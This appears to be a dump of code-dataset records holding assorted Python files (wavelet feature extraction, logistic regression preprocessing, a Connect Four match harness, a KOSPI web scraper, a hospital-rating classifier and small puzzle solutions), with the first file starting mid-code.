torch.cat([LL1,LH1,HL1,HH1],1)\n #print(f'Decomposition 2 shape: {x_l2.shape}')\n \n del LL1,LH1,HL1,HH1,coeffs\n gc.collect()\n \n # decomposition 3\n coeffs = pywt.dwt2(x_l2,'haar')\n LL2, (LH2, HL2, HH2) = coeffs\n LL2, LH2, HL2, HH2 = torch.tensor(LL2),torch.tensor(LH2),torch.tensor(HL2),torch.tensor(HH2)\n x_l3 = torch.cat([LL2,LH2,HL2,HH2],1)\n #print(f'Decomposition 3 shape: {x_l3.shape}')\n \n #orig_input = orig_input.type(torch.float32)\n #x_l1 = x_l1.to(device=\"cuda\",dtype=torch.cuda.FloatTensor)\n #x_l2 = x_l2.to(device=\"cuda\",dtype=torch.cuda.FloatTensor)\n #x_l3 = x_l3.to(device=\"cuda\",dtype=torch.cuda.FloatTensor)\n \n # convolution operations\n #orig_input = orig_input.detach().clone().requires_grad(True)\n orig_input = orig_input.type(torch.float32)\n orig_input = torch.tensor(orig_input,device=\"cuda\",requires_grad=True)\n input_level1 = x_l1.detach().clone().requires_grad_(True)\n 
input_level1 = input_level1.to(device=\"cuda\",dtype=torch.float32)\n #input_level1 = input_level1.type()\n input_level2 = x_l2.detach().clone().requires_grad_(True)\n input_level2 = input_level2.to(device=\"cuda\",dtype=torch.float32)\n #input_level2 = input_level2.type(torch.float16)\n input_level3 = x_l3.detach().clone().requires_grad_(True)\n input_level3 = input_level3.to(device=\"cuda\",dtype=torch.float32)\n #input_level3.requires_grad(True)\n #input_level3 = input_level3.type(torch.float16).to(device=\"cuda\")\n \n del x_l2, x_l3, x_l1\n gc.collect()\n torch.cuda.empty_cache() \n \n orig_input = self.conv(orig_input)\n orig_input = self.relu(self.bn_orig32(self.avg_pool(orig_input)))\n orig_input = self.relu(self.bn_orig64(self.conv1x(orig_input)))\n level1 = self.level1_conv1x1(input_level1)\n level2 = self.level2_conv1x1(input_level2)\n level3 = self.level3_conv1x1(input_level3)\n \n '''\n print(f'Original data type: {x_l1.dtype}')\n print(f'x_l1 data type: {x_l1.dtype}')\n print(f'x_l2 data type: {x_l2.dtype}')\n print(f'x_l3 data type: {x_l3.dtype}')\n print(f'Original input shape after convolution: {orig_input.shape}')\n print(f'Level shape after convolution: {level1.shape}')\n print(f'Level2 shape after convolution: {level2.shape}')\n print(f'Level3 shape after convolution: {level3.shape}')\n '''\n return orig_input,level1,level2,level3\n\n def conv1x1(self,channels,level=1):\n net = \"\"\n if level==1:\n net = nn.Sequential(\n nn.Conv2d(channels[0],channels[1],kernel_size=1),\n nn.AvgPool2d(kernel_size=2,stride=2),\n nn.BatchNorm2d(channels[1]),\n nn.ReLU()\n )\n else:\n net = nn.Sequential(\n nn.Conv2d(channels,channels,kernel_size=1),\n nn.BatchNorm2d(channels),\n nn.ReLU())\n return net\n \nif __name__ == '__main__':\n x = torch.rand((8,3,224,224))\n channel = [[12,32],48,192]\n wl = WaveletTransform(channel).to(device=\"cuda\")\n o,l1,l2,l3 = wl(x)","sub_path":"src/wavelet-FE/wavelet_feature_ex.py","file_name":"wavelet_feature_ex.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"438011040","text":"fin = open('bin.txt', 'r')\nfout = open('bout.txt', 'w')\n\nT = int(fin.readline())\n\ndef solve():\n s = fin.readline().split()[0]\n a = s[0]\n curr = a\n count = 1\n\n for c in s:\n if c != curr:\n count += 1\n curr = c\n ans = count - 1\n if a == \"-\" and count % 2 == 1:\n ans += 1\n if a == \"+\" and count % 2 == 0:\n ans += 1\n #print(a, count, ans)\n return ans\n\nfor i in range(T):\n fout.write(\"Case #\" + str(i+1) + \": \" + str(solve()) + \"\\n\")\n\nfin.close()\nfout.close()\n","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_raynboz_b.py","file_name":"16_0_2_raynboz_b.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"404513609","text":"from helios.utils.async_dispatch import (\n async_method,\n)\n\n\nclass AsyncChainMixin:\n\n coro_get_canonical_block_by_number = async_method('get_canonical_block_by_number')\n coro_get_block_by_hash = async_method('get_block_by_hash')\n coro_get_block_by_header = async_method('get_block_by_header')\n\n coro_import_block = async_method('import_block')\n coro_import_chain = async_method('import_chain')\n coro_get_block_stake_from_children = async_method('get_block_stake_from_children')\n coro_get_mature_stake = async_method('get_mature_stake')\n coro_get_all_chronological_blocks_for_window = 
async_method('get_all_chronological_blocks_for_window')\n coro_import_chronological_block_window = async_method('import_chronological_block_window')\n coro_update_current_network_tpc_capability = async_method('update_current_network_tpc_capability')\n coro_get_local_tpc_cap = async_method('get_local_tpc_cap')\n coro_re_initialize_historical_minimum_gas_price_at_genesis = async_method(\n 're_initialize_historical_minimum_gas_price_at_genesis')\n\n\n","sub_path":"helios/chains/coro.py","file_name":"coro.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"243433933","text":"'''\nPreprocess and split the data, compute x_opt and f_opt\n'''\n\nimport numpy as np\nimport argparse\nimport pickle\nfrom datasets.utils import get_dataset\nimport numpy.linalg as la\nfrom config import data_path, is_normalized, l2_weights, is_convex, shuffle\nfrom loss_functions import LogisticRegression\nfrom sklearn.preprocessing import normalize\nimport os\n\nparser = argparse.ArgumentParser(description='Preprocessing for the dataset')\nparser.add_argument('--data', action='store', dest='dataset', type=str, help='Which dataset?')\nparser.add_argument('--cond', action='store', dest='cond', type=float, help='Condition of halting, grad norm sqr < ?')\nparser.add_argument('--it_max', action='store', dest='it_max', type=int, help='Max iteration')\nparser.add_argument('--n', action='store', dest='n_workers', type=int, help='Number of local workers')\n\nargs = parser.parse_args()\ndataset = args.dataset\nn_workers = args.n_workers\nit_max = args.it_max\ncond = args.cond\n\nl2 = l2_weights[dataset]\nif is_convex:\n l2 = 0\n\nA, b = get_dataset(dataset, data_path)\nprint(\"===Data has been loaded===\")\nif is_normalized:\n A = normalize(A)\n\nif shuffle:\n idx = np.arange(len(b))\n np.random.shuffle(idx)\n A = A[idx]\n b = b[idx]\n\nN, d = A.shape\nm = N // n_workers\nA = A[:(m*n_workers)]\nb = b[:(m*n_workers)]\nN, _ = A.shape\nx0 = np.zeros((d,))\nloss_function = LogisticRegression(A, b, l2=l2)\nL = loss_function.smoothness()\n\n\ngrad_norm_sq = la.norm(loss_function.gradient(x0))\nx = np.copy(x0)\nprint('f_0: {0}'.format(loss_function.value(x)))\n\nk = 0\nwhile grad_norm_sq >= cond and k <= it_max:\n\n grad = loss_function.gradient(x)\n grad_norm_sq = loss_function.norm(grad) ** 2\n x = x - (1 / L) * grad\n\n if k % 50 == 0:\n print(grad_norm_sq)\n\n k += 1\n\nx_opt = x.copy()\nf_opt = loss_function.value(x_opt)\n\ndata_info = {'x_opt': x_opt, 'f_opt': f_opt, 'L': L}\nif is_convex:\n cvx = 'cvx'\nelse:\n cvx = 'scvx'\ndataset_name = '{0}-{1}-{2}'.format(dataset, cvx, n_workers)\ndata_set_path = '{0}{1}/'.format(data_path, dataset_name)\nif not os.path.exists(data_set_path):\n os.makedirs(data_set_path)\nfile_name = '{0}{1}-{2}-{3}-{4}_info.p'.format(data_set_path, dataset, cond, it_max, l2)\npickle.dump(data_info, open(file_name, \"wb\"))\n\n# Splitting the data\nf_i = 0\nfor i in range(n_workers):\n Ai = A[(i * m):(i + 1) * m]\n bi = b[(i * m):(i + 1) * m]\n data_info = {'Ai': Ai, 'bi': bi}\n local_data_path = '{0}{1}/'.format(data_set_path, str(i))\n if not os.path.exists(local_data_path):\n os.makedirs(local_data_path)\n pickle.dump(Ai, open(local_data_path + 'A.p', \"wb\"))\n pickle.dump(bi, open(local_data_path + 'b.p', \"wb\"))\n\nprint(\"===Preprocessing is 
finished===\")\n","sub_path":"logistic_regression/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"54402388","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef plot_hyperparams_over_search(df, hyperparams):\n \"\"\"Function to plot the value of hyperparameters over the tuning window\n\n Parameters\n ----------\n df : pandas.DataFrame\n DataFrame containing the hyperparameter search results\n hyperparams : list\n list of hyperparameters used for tuning\n\n Returns\n -------\n sns.regplot object\n\n \"\"\"\n\n hyperparams = hyperparams\n fig, axs = plt.subplots(1, len(hyperparams), figsize=(24, 6))\n i = 0\n\n if len(hyperparams) > 1:\n for i, hyper in enumerate(hyperparams):\n sns.regplot(\"iteration\", hyper, data=df, ax=axs[i])\n axs[i].set(\n xlabel=\"Iteration\",\n ylabel=\"{}\".format(hyper),\n title=\"{} over Search\".format(hyper),\n )\n\n else:\n sns.regplot(\"iteration\", hyperparams[0], data=df)\n axs.set(\n xlabel=\"Iteration\",\n ylabel=\"{}\".format(hyperparams[0]),\n title=\"{} over Search\".format(hyperparams[0]),\n )\n\n return plt.tight_layout()\n\n\ndef plot_search_dist(df, hyperparams):\n \"\"\"Function to create a kde plot of hyperparameters used over the tuning window\n\n Parameters\n ----------\n df : pandas.DataFrame\n DataFrame containing the hyperparameter search results\n hyperparams : list\n list of hyperparameters used for tuning\n\n Returns\n -------\n sns.kdeplot object\n\n \"\"\"\n\n hyperparams = hyperparams\n fig, axs = plt.subplots(1, len(hyperparams), figsize=(24, 6))\n i = 0\n\n if len(hyperparams) > 1:\n for i, hyper in enumerate(hyperparams):\n sns.kdeplot(df[hyperparams[i]], linewidth=2, ax=axs[i])\n axs[i].set(\n xlabel=hyperparams[i],\n ylabel=\"Density\",\n title=\"{} Search Distribution\".format(hyperparams[i]),\n )\n\n else:\n sns.kdeplot(df[hyperparams[0]], linewidth=2)\n axs.set(\n xlabel=hyperparams[i],\n ylabel=\"Density\",\n title=\"{} Search Distribution\".format(hyperparams[i]),\n )\n\n return plt.tight_layout()","sub_path":"Grocery_Recommender/Model_Build/plot_hyperparameter_tuning.py","file_name":"plot_hyperparameter_tuning.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"377460235","text":"# -*- coding=utf-8 -*-\n\nfrom mongo import mongo\nimport random\nfrom model.card import Card, HandsCard\nimport hands_range\nfrom model.board import ResultStatis\nimport time\n\n\ndef insertDataList(db, dataList):\n ratedb = db\n # print(dataList)\n for data in dataList:\n r = ratedb.find_one({\n 'hands': data['hands']\n })\n if not r:\n for i in range(0, 10):\n data['winRate' + str(i)] = data['winNum' + str(i)] / data['totalNum' + str(i)]\n ratedb.insert_one(data)\n else:\n data['totalNum'] += r['totalNum']\n data['winNum'] += r['winNum']\n for i in range(0, 10):\n data['winNum' + str(i)] += r['winNum' + str(i)]\n data['totalNum' + str(i)] += r['totalNum' + str(i)]\n data['winRate' + str(i)] = data['winNum' + str(i)] / data['totalNum' + str(i)]\n ratedb.replace_one({'hands': data['hands']}, data, True)\n\n\ndef insertMapData(db, dataMap):\n for key in dataMap.keys():\n r = db.find_one({\n 'hands': key.simple_string(),\n })\n data = dataMap[key]\n if not r:\n for i in range(0, 10):\n data['rate' + str(i)] = data['num' + str(i)] / data['totalNum']\n if data['num' + str(i)] != 0:\n 
data['winRate' + str(i)] = data['winNum' + str(i)] / data['num' + str(i)]\n            db.insert_one(data)\n        else:\n            data['totalNum'] += r['totalNum']\n            data['winNum'] += r['winNum']\n            data['winRate'] = data['winNum'] / data['totalNum']\n            for i in range(0, 10):\n                data['winNum' + str(i)] += r['winNum' + str(i)]\n                data['num' + str(i)] += r['num' + str(i)]\n                data['rate' + str(i)] = data['num' + str(i)] / data['totalNum']\n                if data['num' + str(i)] != 0:\n                    data['winRate' + str(i)] = data['winNum' + str(i)] / data['num' + str(i)]\n            db.replace_one({'hands': key.simple_string()}, data, True)\n\n\ndef updateHandsWinNumForRange(handsList, playerNum, db, totalNum=1000, toDealNum=5):\n    realRange = hands_range.expandRangeToReal(handsList)\n\n    for i in range(0, 100):\n        handsList = []\n        cards = set()\n        for n in range(0, playerNum):\n            hands = None\n            while hands is None or hands[0] in cards or hands[1] in cards:\n                hands = HandsCard.from_string(random.choice(realRange))\n            cards.add(hands[0])\n            cards.add(hands[1])\n            handsList.append(hands)\n\n        # use the caller-supplied totalNum instead of a hard-coded 1000\n        res = ResultStatis.fromHandsAndGenerateResultMap(handsList, totalNum=totalNum)\n\n        insertMapData(db, res)\n\n\ndef topHandsResult(k=0.25):\n    if type(k) == float:\n        k = int(169 * k)\n    ratedb = mongo.generateDB(rangee='169')\n    res = ratedb.find({}).sort([('winRate', -1)])\n    handsResult = set()\n    for i in range(0, k):\n        hands = Card.array_from_string(res[i]['hands'])\n        handsResult.add(hands)\n        if __name__ == '__main__':\n            print(res[i]['hands'], end=' ')\n    return handsResult\n\n\ndef autoReduceRange(cur=170, playerNum=2, step=5, limit=300000, target=50, postfix=''):\n    ls2 = hands_range.getRangeHands(cur)\n    while True:\n        db = mongo.generateDB(rangee=str(cur))\n        r = db.find_one({'hands': 'AA'})\n        if r and r['totalNum'] >= limit:\n            ls2 = hands_range.reduceHands(cur)\n            cur -= step\n            continue\n        # playerNum was previously missing here, which bound db to the wrong parameter\n        updateHandsWinNumForRange(ls2, playerNum, db)\n\n\ndef updateResultStatisData(handsRange=170, playerNum=2, step=5, limit=1000000, target=80, postfix='NoneHigh', toDealNum=5):\n    ls = hands_range.getRangeHands(handsRange)\n    t1 = time.time()\n    while handsRange >= target:\n        db = mongo.generateDB(playerNum=playerNum, rangee=str(handsRange), postfix=postfix)\n        r = db.find_one({'hands': 'AA'})\n        if r and r['totalNum'] >= limit:\n            ls = hands_range.reduceHands(handsRange, postfix=postfix)\n            handsRange -= step\n            continue\n        print('%.1f' % (time.time() - t1), len(ls))\n        t1 = time.time()\n        updateHandsWinNumForRange(ls, playerNum, db, toDealNum=toDealNum)\n\n\ndef profileTest(handsRange=170, playerNum=2, step=5, limit=1000000, target=80, postfix='NoneHigh', toDealNum=5):\n    ls = hands_range.getRangeHands(handsRange)\n    db = mongo.generateDB(playerNum=playerNum, rangee=str(handsRange), postfix=postfix)\n\n    updateHandsWinNumForRange(ls, playerNum, db, toDealNum=toDealNum)\n\n\ndef main():\n    # updateResultStatisData(playerNum=4,limit=300000)\n    # cProfile.run('profileTest()')\n    updateResultStatisData(playerNum=4, toDealNum=4, limit=300000)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"559909623","text":"import string\n\ndef is_isogram(s):\n    alpha = string.ascii_lowercase\n    s = s.lower()\n    l = list(s.replace('-', '').replace(' ', ''))\n    print(l)\n    if len(set(l)) == len(l):\n        return True\n    else:\n        return 
False\n","sub_path":"isogram.py","file_name":"isogram.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"474629332","text":"class ConnectionFactory(object):\n\n TYPE_VIYA = 'Viya'\n TYPE_WAREHOUSE = 'Warehouse'\n TYPE_MYSQL = 'MySql'\n\n @staticmethod\n def get_connection(connection):\n class_string = '%sConnection' % str(connection)\n module_obj = __import__('Connections.%s' % class_string)\n\n if hasattr(module_obj, class_string):\n class_obj = getattr(module_obj, class_string)\n return class_obj()\n else:\n raise Exception('CONNECTION: Requested Connection Type Not Found')\n\n def set_connection(self, *argv):\n conns = dict()\n for arg in argv:\n conns.__setitem__(arg, self.get_connection(arg))\n return conns\n","sub_path":"Connections/ConnectionFactory.py","file_name":"ConnectionFactory.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"623666338","text":"import copy\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimport connect_four_3d as games\n\n\n\nclass vs:\n def __init__(self, agent_1, agent_2):\n self.game = games.ConnectFour()\n self.agent_1 = agent_1\n self.agent_2 = agent_2\n self.elo = False\n self.k = 32\n self.a1_elo = None\n self.a1_elo_hist = []\n self.a2_elo = None\n self.a2_elo_hist = []\n self.a1_win = []\n self.a1_avg_win = []\n self.a1_player = []\n self.a2_win = []\n self.a2_avg_win = []\n self.a2_player = []\n self.history = []\n\n def add_elo(self, R1, R2):\n \"\"\"Adds a specified elo rating for agent_1 and agent_2\"\"\"\n self.elo = True\n self.a1_elo = R1\n self.a2_elo = R2\n self.a1_elo_hist = [self.a1_elo]\n self.a2_elo_hist = [self.a2_elo]\n\n def move(self, game, action):\n \"\"\"Performs for selected action for the player whose turn it is\"\"\"\n if game.p1_turn:\n game.player_1(action)\n elif game.p2_turn:\n game.player_2(action)\n\n def play(self, episodes):\n \"\"\"\n Initialises and plays through one episode of connect four with the two \n agents competing in their randomly selected positions\n \"\"\"\n self.a1_win = []\n self.a1_avg_win = []\n self.a1_player = []\n self.a2_win = []\n self.a2_avg_win = []\n self.a2_player = []\n self.history = []\n\n for i in range(episodes):\n self.game.start()\n self.history = []\n self.agent_1.interface_init(copy.deepcopy(self.game))\n self.agent_2.interface_init(copy.deepcopy(self.game))\n a1 = np.random.choice((True, False))\n a1_p1 = copy.deepcopy(a1)\n if a1_p1:\n self.a1_player.append(1)\n self.a2_player.append(2)\n else:\n self.a1_player.append(2)\n self.a2_player.append(1)\n\n while self.game.active: \n if a1:\n action_1 = self.agent_1.interface_turn()\n self.agent_2.interface_update(action_1)\n\n self.move(self.game, action_1)\n\n self.history.append(copy.deepcopy(self.game.grid))\n a1 = False\n else:\n action_2 = self.agent_2.interface_turn()\n self.agent_1.interface_update(action_2)\n\n self.move(self.game, action_2)\n\n self.history.append(copy.deepcopy(self.game.grid))\n a1 = True\n\n if self.game.p1_win:\n if a1_p1:\n self.a1_win.append(1)\n self.a2_win.append(-1)\n self.elo_update(1, 0)\n elif not a1_p1:\n self.a1_win.append(-1)\n self.a2_win.append(1)\n self.elo_update(0, 1)\n elif self.game.p2_win:\n if a1_p1:\n self.a1_win.append(-1)\n self.a2_win.append(1)\n self.elo_update(0, 1)\n elif not a1_p1:\n self.a1_win.append(1)\n self.a2_win.append(-1)\n self.elo_update(1, 0)\n elif 
self.game.draw:\n self.elo_update(0.5, 0.5)\n self.a1_win.append(0)\n self.a2_win.append(0)\n\n self.a1_avg_win.append(np.sum(self.a1_win) / len(self.a1_win))\n self.a2_avg_win.append(np.sum(self.a2_win) / len(self.a2_win))\n if (i + 1) / episodes * 100 % 1 < np.finfo(float).eps:\n print('%', int((i + 1) / episodes * 100))\n\n def elo_update(self, points_1, points_2):\n \"\"\"Updated the elo ratings of the competing agents\"\"\"\n if self.elo:\n E1 = 1 / (1 + 10**((self.a2_elo - self.a1_elo) / 400))\n E2 = 1 / (1 + 10**((self.a1_elo - self.a2_elo) / 400))\n R1_new = self.a1_elo + self.k * (points_1 - E1)\n R2_new = self.a2_elo + self.k * (points_2 - E2)\n self.a1_elo = R1_new\n self.a2_elo = R2_new\n #R2_new = self.a2_elo\n self.a1_elo_hist.append(R1_new)\n self.a2_elo_hist.append(R2_new)\n\n def mover_stat(self):\n \"\"\"Displays statistics about win/loss/draws depending on first or second player\"\"\"\n a1_first, a1_second = 0, 0\n a2_first, a2_second = 0, 0\n a1_first_win, a1_first_draw, a1_first_loss = 0, 0, 0\n a2_first_win, a2_first_draw, a2_first_loss = 0, 0, 0\n a1_second_win, a1_second_draw, a1_second_loss = 0, 0, 0\n a2_second_win, a2_second_draw, a2_second_loss = 0, 0, 0\n\n for i in range(len(self.a1_player)):\n if self.a1_player[i] == 1:\n a1_first += 1\n a2_second += 1\n if self.a1_win[i] == 1:\n a1_first_win += 1\n a2_second_loss += 1\n elif self.a1_win[i] == -1:\n a1_first_loss += 1\n a2_second_win += 1\n elif self.a1_win[i] == 0:\n a1_first_draw += 1\n a2_second_draw += 1\n elif self.a1_player[i] == 2:\n a1_second += 1\n a2_first += 1\n if self.a1_win[i] == 1:\n a1_second_win += 1\n a2_first_loss += 1\n elif self.a1_win[i] == -1:\n a1_second_loss += 1\n a2_first_win += 1\n elif self.a1_win[i] == 0:\n a1_second_draw += 1\n a2_first_draw += 1\n \n print('Agent 1 P1 rounds:', a1_first, 'as P2:', a1_second)\n print('Agent 2 p1 rounds:', a2_first, 'as P2:', a2_second)\n print(' ')\n print('Agent 1 total - win:', np.round((a1_first_win + a1_second_win) / (a1_first + a1_second), 5), \n 'draw:', np.round((a1_first_draw + a1_second_draw) / (a1_first + a1_second), 5), \n 'loss:', np.round((a1_first_loss + a1_second_loss) / (a1_first + a1_second), 5))\n print('Agent 2 total - win:', np.round((a2_first_win + a2_second_win) / (a2_first + a2_second), 5), \n 'draw:', np.round((a2_first_draw + a2_second_draw) / (a2_first + a2_second), 5), \n 'loss:', np.round((a2_first_loss + a2_second_loss) / (a2_first + a2_second), 5))\n print(' ')\n print('Agent 1 as P1 - win:', np.round(a1_first_win / a1_first, 5), \n 'draw:', np.round(a1_first_draw / a1_first, 5), \n 'loss:', np.round(a1_first_loss / a1_first, 5))\n print('Agent 1 as P2 - win:', np.round(a1_second_win / a1_second, 5), \n 'draw:', np.round(a1_second_draw / a1_second, 5), \n 'loss:', np.round(a1_second_loss / a1_second, 5))\n print(' ')\n print('Agent 2 as P1 - win:', np.round(a2_first_win / a2_first, 5), \n 'draw:', np.round(a2_first_draw / a2_first, 5), \n 'loss:', np.round(a2_first_loss / a2_first, 5))\n print('Agent 2 as P2 - win:', np.round(a2_second_win / a2_second, 5), \n 'draw:', np.round(a2_second_draw / a2_second, 5), \n 'loss:', np.round(a2_second_loss / a2_second, 5))\n \n","sub_path":"embedding/CdIM_prototype/points/versus_3d.py","file_name":"versus_3d.py","file_ext":"py","file_size_in_byte":7334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"631315419","text":"# プログラム2.2\n\nget_ipython().system('pip3 install category_encoders')\nimport pandas as pd\n# 
Import category_encoders\nimport category_encoders as cate_enc\n# Import the neural network classifier class\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import train_test_split\n\n# Prepare the data\ndef prepare():\n    #!kaggle datasets download -d cms/hospital-general-information\n    get_ipython().system('unzip hospital-general-information.zip')\n\ndef preprocess():\n    df = pd.read_csv('HospInfo.csv')\n    print(df)\n    # Hospital data fields\n    features = ['City', 'State',\n                'County Name', 'Hospital Type',\n                'Emergency Services',\n                'Meets criteria for meaningful use of EHRs',\n                'Mortality national comparison',\n                'Safety of care national comparison',\n                'Readmission national comparison',\n                'Patient experience national comparison',\n                'Effectiveness of care national comparison',\n                'Timeliness of care national comparison',\n                'Efficient use of medical imaging national comparison']\n    ignores = []\n    for f in df.columns.values:\n        if f not in features:\n            ignores.append(f)\n    ignores.remove('Hospital overall rating')\n    ratings = ['1', '2', '3', '4', '5']\n    mp = {'1':0, '2':1, '3':2, '4':3, '5':4}\n    df = df[df['Hospital overall rating'].isin(ratings)]\n    df['Hospital overall rating'].replace(mp, inplace=True)\n    df.drop(ignores, axis=1, inplace=True)\n    # One-hot encoding\n    ohe = cate_enc.OneHotEncoder(cols=features, handle_unknown='impute')\n    ndf = ohe.fit_transform(df)\n    # Use the hospital overall rating as the prediction target\n    y = ndf.loc[:,['Hospital overall rating']].values.ravel()\n    ndf.drop(columns=['Hospital overall rating'], inplace=True)\n    return ndf, y, ratings\n\ndef main():\n    prepare()\n    ndf, y, ratings = preprocess()\n    # Check the one-hot encoding result\n    print(ndf.loc[:,ndf.columns.values[:5]].head())\n    print(ndf.loc[:,ndf.columns.values[3565:3570]].head())\n    # Split into training and test data, then\n    # train and predict the rating with a neural network\n    X = ndf.loc[:,ndf.columns.values].values\n    X_tr, X_te, y_tr, y_te = train_test_split(X, y, random_state=0, train_size=0.7)\n    clf = MLPClassifier(solver='adam', alpha=1e-5,\n                        hidden_layer_sizes=(100,),\n                        activation='tanh',\n                        random_state=1, max_iter=3000)\n    clf.fit(X_tr, y_tr)\n    y_pre = clf.predict(X_te)\n    print(classification_report(y_te, y_pre, target_names=ratings, zero_division=1))\n\nif __name__ == '__main__':\n    main()\n\n","sub_path":"py/prog2-02.py","file_name":"prog2-02.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"168421399","text":"\"\"\"\nSzymon Chomej's\nfavourite song parameters\n\"\"\"\nartist = \"Kwiat Jabłoni\" #Best Polish band :)\ntitle = \"Dziś Późno Pójdę Spać\"\ngenre = \"Alternative\"\nalbum = \"Niemożliwe\"\noriginCountry = \"Poland\"\nreleaseYear = 2019\ndurationsInSeconds = 232\nyouTubeViews = 22223205\nmySonLikeIt = True\n\n\"\"\"\nMy score on a scale of 1 to 10,
\nwhere 1 is the worst and 10 is the best.\n\"\"\"\n# decimal point, not a comma: 9,5 would create the tuple (9, 5)\nmyScore = 9.5\n","sub_path":"Kurs Pirple/Homeworks/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"299025378","text":"#!/usr/bin/env python3\n \nimport pandas as pd\nimport csv\n\n# read the csv\ndata = pd.read_csv(\"df_data.csv\")\n# make new csv with wanted results\narr_data = open(\"arr_data.csv\", \"w\")\n\n# to show the fields that are important to you\n# as admin, it supposedly lets you download a csv with the issue key so it's just adding it in the columns to show\ndf = pd.DataFrame(data, columns= ['Summary','Issue Type','Client','Project','Role Title','Role ID','POC','Resource Start Date','Role Created Date','Resource End Date'])\n\n# show everything\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', 10)\n\n# print result\nprint(df)\nprint(df, file=arr_data)\narr_data.close()\n","sub_path":"arrange.py","file_name":"arrange.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"61451549","text":"\n\n# class header\nclass _COMPARATIVE():\n\tdef __init__(self):\n\t\tself.name = \"COMPARATIVE\"\n\t\tself.definitions = [u'the form of an adjective or adverb that expresses a difference in amount, number, degree, or quality: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_comparative.py","file_name":"_comparative.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"557899432","text":"# Fetch the KOSPI closing prices page by page and draw a line chart\n# https://finance.naver.com/sise/sise_index_day.nhn?code=KOSPI&page=1\n\nfrom bs4 import BeautifulSoup\nimport requests as req\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ncode = \"KOSPI\"\n\ndef get_data(page_num):\n    uri = \"https://finance.naver.com/sise/sise_index_day.nhn?code={}&page={}\".format(code, page_num)\n    response = req.get(uri)\n    if response.status_code == 200:\n        html = response.text\n        soup = BeautifulSoup(html, 'html.parser')\n        # tr_tag = soup.find_all(\"tr\")\n        date_data = soup.find_all(\"td\", class_ = \"date\")\n        date_array = [date.get_text(strip = True) for date in date_data]\n        number1_data = soup.find_all(\"td\", class_ = \"number_1\")\n        number1_array = [number1.get_text(strip = True) for number1 in number1_data]\n\n        np_date_array = np.array(date_array)\n        np_number1_array = np.array(number1_array).reshape(6, 4)\n        data = pd.DataFrame(np_number1_array, columns = [\"1\", \"2\", \"3\", \"4\"], index = np_date_array)\n        data[\"1\"] = [float(item1.replace(\",\", \"\")) for item1 in data[\"1\"]]\n        data[\"3\"] = [float(item1.replace(\",\", \"\")) for item1 in data[\"3\"]]\n        return data\n    else:\n        raise Exception('error')\n    \ndef get_all_pages(page):\n    result_pd = None\n    # iterate up to the requested page instead of ignoring the argument\n    for page_num in range(1, page + 1):\n        res = get_data(page_num)\n        if result_pd is None: result_pd = res\n        else: result_pd = result_pd.append(res)\n    return result_pd\n\ndata = get_all_pages(3)\ndata.sort_index(inplace=True)\n\nplt.subplot(211)\nplt.plot(data.index, data[\"1\"])\nplt.xticks(rotation=30)\nplt.title(\"price\")\nplt.grid()\n\nplt.subplot(212)\nplt.bar(data.index, 
data[\"3\"])\nplt.xticks(rotation=30)\nplt.title(\"mount\")\nplt.grid()\n\nplt.show()\n\n\n\n\n","sub_path":"pandas/3_homework.py","file_name":"3_homework.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"53504191","text":"class Solution(object):\n def minPathSum(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n # if not grid: return 0\n # x, y = len(grid[0]), len(grid)\n # for i in range(1, x):\n # grid[0][i] = grid[0][i-1] + grid[0][i]\n # for j in range(1, y):\n # grid[j][0] = grid[j-1][0] + grid[j][0]\n # for j in range(1, y):\n # for i in range(1, x):\n # grid[j][i] = min(grid[j-1][i], grid[j][i-1]) + grid[j][i]\n # return grid[-1][-1]\n\n # dp[0] = dp[0] + i[0]\n # for i in 1->l\n # return dp[-1]\n dp = [0]+[float('inf')]*len(grid[0])\n for i in grid:\n for j in range(len(grid[0])):\n dp[j] = min(dp[j-1], dp[j]) + i[j]\n return dp[-2]","sub_path":"Algorithms/Minimum 